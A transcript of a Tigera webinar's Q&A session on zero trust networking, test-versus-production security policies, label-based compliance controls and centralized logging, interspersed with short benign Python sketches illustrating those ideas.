Michael: We had a question just come in that asked: with a zero trust network, does that mean that perimeter firewalls, DMZs and so forth are dead? Do you no longer need them?
Christopher: I have two answers here. I will first take the inflammatory answer and say that, if you do it right, you probably don’t need them, so long as you really do it right. For example, you may not need them if all your workloads have been appropriately hardened, you’re using TLS, and you’re doing appropriate authentication for every TLS flow et cetera. Then you may indeed not need a firewall or a DMZ. If you’re interested in that, you can go back and look at the Google BeyondCorp papers for their thinking on it. I tend to agree with that. In fact, it was a similar thing, I wrote a blog about this a couple weeks ago and I have a follow-up blog coming out. What I did for Tigera at Blackout. We were very much based on application layer encryption rather than classic firewalling.
Christopher: That said, basic firewalls and DMZs do have their place, especially if you can move them off site. If I start looking at the perimeter, what I might be asking the perimeter to do is bulk filtering: filtering out DDoS attacks, filtering out things that just are [inaudible 00:37:36] coming in that I’d otherwise be spending CPU cycles on my worker nodes to filter, when really it’s just simple static rules that keep the bulk of the noise out. No one should be [inaudible 00:37:47] into my cluster from the outside. I can just filter that at the edge and it’s a very clean point. I have to make the assumption that somebody is going to get past that, so I should have rules that cover SSH internally as well. But at least it’s a first-level coarse filter. If you can move it off site, then things like DDoS traffic don’t come in through your constrained WAN links; they’re blocked at the other edge, where it’s up to the service provider to absorb them rather than you. I think there is a place for them, but do I think you could have just as secure an environment without them? I think it’s possible, but you have to put in a lot of careful thought before you go down that path.
Michael: We had a question around non-production environments and what approach you would take to balancing security when you’re using a non-production environment.
Christopher: On the production versus non-prod question, you can relax your security requirements on non-prod. You probably should make sure that non-prod can’t talk to prod, or you might want to say that non-prod or test can read from prod but not write to prod if you want protection on real data. All those rules are possible. The thing, though, that I like to say, and this goes back to a large electric car manufacturer who had a bit of a problem on their Kubernetes cluster some time ago: be very careful about having different policies for prod and non-prod, or test and dev versus prod. If you test with one set of security controls and then you go into production with a different set, there are a couple of problems. Best case, you end up breaking things, because you can’t get access to things that you could access in test, where you had weaker security controls. That means the system’s protecting you. The other option, of course, is that you didn’t test the control that you’re putting in, and it turns out the extra control you put in prod but not in dev doesn’t work as you intended. Your test didn’t catch that because you’re only deploying that control in prod. Therefore, prod becomes your test, and you may or may not discover that the control doesn’t work.
Christopher: Also, if you test with one set of controls and you intend to go to prod with the other, just like every other deployment, those decisions get made at the last second. It’s getting down to the wire, you’ve got to go to prod tomorrow. Then you discover when you go into prod that it doesn’t work. What are you going to do? If you’re under pressure, you’re going to deploy with the thing you tested, not what your target was for prod. If you don’t test with what you’re going to deploy, you’re going to deploy what you tested. I would caution strongly against having different security models for test and dev versus prod. You want to make sure from the get-go that your integration testing, your functional testing, your end-to-end testing are testing the way you would go into prod. Otherwise, you will go into prod with what you tested with, and that is probably a bad idea.
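One way to keep test and prod from drifting apart is to compare the two policy sets before a release. The sketch below assumes, purely for illustration, that each environment's policies are available as a dictionary mapping a policy name to its spec; the function name and the sample specs are hypothetical.

```python
def policy_drift(test_policies: dict, prod_policies: dict) -> dict:
    """Report policies that exist in only one environment or differ between the two."""
    test_names = set(test_policies)
    prod_names = set(prod_policies)
    return {
        "test_only": sorted(test_names - prod_names),
        "prod_only": sorted(prod_names - test_names),
        "changed": sorted(
            name
            for name in test_names & prod_names
            if test_policies[name] != prod_policies[name]
        ),
    }


def same_security_model(test_policies: dict, prod_policies: dict) -> bool:
    """True only when both environments carry identical policies."""
    drift = policy_drift(test_policies, prod_policies)
    return not any(drift.values())
```

A release gate could refuse to promote a build when `same_security_model` returns false, so the controls that reach prod are the ones that were actually exercised in test.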
Michael: A question came in about all the different compliance requirements that you talked about. When you have to address multiple compliance needs, what’s the best approach for that?
Christopher: I think the best approach, what we counsel folks and what we’ve seen folks do, is this: you should not be writing policies for individual workloads. You should be writing policies for behaviors, or personalities if you want to think of it that way. Is this thing PCI contaminated? Does it have customer card record data in it? Is it PII contaminated? Does it have personally identifying information in it? If it’s got PCI data, it’s probably also got personally identifying information in it, so it’s also PII contaminated. It might have PII data in it and have health records, so it’s HIPAA contaminated. Instead of trying to handle the whole matrix of possibilities, you should just have a PCI policy. Only things that are identified as being PCI compliant can talk to PCI contaminated resources. Only things that have been proven HIPAA compliant can talk to HIPAA contaminated resources. Same thing: GDPR compliant to talk to PII contaminated resources. Then you identify that resource as being PII contaminated and PCI contaminated, or PII contaminated and GDPR contaminated, or HIPAA contaminated. The policies will be attracted to that label, that metadata that says this thing is PII contaminated or PCI contaminated.
Christopher: That way, you don’t have to do the full matrix of what the possible combinations are. You just say, here’s my PII rules, here’s my PCI rules, here’s my HIPAA rules. Those deploy independently to each of those workloads. It might mean that in the next version of that database you split the patient records from the PII data. Now the patient records have some anonymizing data, because you’re going to be doing some research on them, and there’s some PII data that maps that anonymizing record locator to the patient identifying information. Then the resource that had been PII contaminated and HIPAA contaminated is now either just HIPAA contaminated or just PII contaminated. The next version will apply the right policies to each of those two new workloads, whereas before, it was a single workload that had both. The compliance team never had to change anything there; all that changed was the labels associated with it. The labels say, what is the personality of this workload, or the set of personalities? I think that’s one way of doing it.
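The idea of one rule per "contamination" label, composed independently, can be sketched in a few lines of Python. The label names and the `may_connect` function are hypothetical stand-ins for whatever labels and policy engine are actually in use; the point is only that each rule is written once and a resource picks up whichever rules match its labels.

```python
# Hypothetical rule table: a resource carrying the key label may only be
# reached by clients carrying the corresponding value label.
REQUIRED_CLIENT_LABEL = {
    "pci-contaminated": "pci-compliant",
    "pii-contaminated": "gdpr-compliant",
    "hipaa-contaminated": "hipaa-compliant",
}


def may_connect(client_labels: set, resource_labels: set) -> bool:
    """Allow the connection only if the client satisfies every rule the resource attracts."""
    required = {
        REQUIRED_CLIENT_LABEL[label]
        for label in resource_labels
        if label in REQUIRED_CLIENT_LABEL
    }
    return required <= client_labels
```

If a database labeled both `pii-contaminated` and `hipaa-contaminated` is later split into two workloads with one label each, the rule table stays untouched; only the labels on the workloads change.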
Christopher: We did get one question about … It sounds like you were saying that the logs should be able to answer all questions that may occur on all activities at any time. Are there any industry tools, papers, books et cetera that help us ensure that we’re covering those bases? I’m not really sure about papers and books. You should be logging everything if you can. You might want to be aggregating those logs, et cetera, but yes. It’s better to have more logs, provided that you can make sense of them, than fewer logs and saying, “Gee, I really wish I knew what happened at that moment before it all went horribly, horribly wrong.” Yes. Everything should be logged. There are some great tools out there, things like EFK stacks, which is Elasticsearch, Fluentd and Kibana, or ELK, which is Elasticsearch, Logstash and Kibana. You can look those up.
Christopher: We have lots of customers that use EFK or ELK. The logs go into that, and then you can start doing Google-like searches: show me all of the events over the last 30 days where pods of this type tried to talk to pods of this type, and was the traffic allowed or denied? There’s lots of tooling around that that you can use. There are commercial offerings that package those up nicely as well. Those are the tools. As far as books and papers, there’s been a lot of stuff written over the years about managing logs. I can’t think of anything off the top of my head, but I would say that would be a good starting point.
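The kind of question described here (which flows between two pod types were allowed or denied in the last 30 days) can be sketched as a filter over log records. This is an in-memory stand-in, not an Elasticsearch query; the record fields (`time`, `src_type`, `dst_type`, `action`) are assumed for illustration.

```python
from datetime import datetime, timedelta


def flows_between(logs, src_type, dst_type, now, days=30):
    """Return (time, action) for matching flow records within the last `days` days."""
    cutoff = now - timedelta(days=days)
    return [
        (entry["time"], entry["action"])
        for entry in logs
        if entry["time"] >= cutoff
        and entry["src_type"] == src_type
        and entry["dst_type"] == dst_type
    ]


def denied_count(logs, src_type, dst_type, now, days=30):
    """Count how many of the matching flows were denied."""
    return sum(
        1
        for _, action in flows_between(logs, src_type, dst_type, now, days)
        if action == "deny"
    )
```

In a log stack, the same question would be expressed in that stack's own query language; the sketch only shows the shape of the filter.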
Michael: Okay, great. That’s about all the time we have for questions today. We’d like to thank you guys all for attending. Everyone give Christopher a big virtual hand and virtual applause. Two messages for you guys before we go, we are hiring here at Tigera. It’s a great, dynamic, fun place to work. If you guys match any of these open positions or are a talented person looking for a great career, please do contact us. Lastly, the next upcoming webinar that we have is on September 12th. It is 10 am Pacific, 1 pm ET. It is on IDS and IPS in the age of TLS V3. Now those are some acronyms, so this will be a technical presentation rather than a best practice. There’s the link to go get it, okay? Without further ado, we’d like to thank you guys all for coming. The copy of this webcast as a video will be available as soon as it processes on [inaudible 00:46:38]. Usually within five minutes, and it will be available if you want to review. Thanks again for coming.
Christopher: Thank you.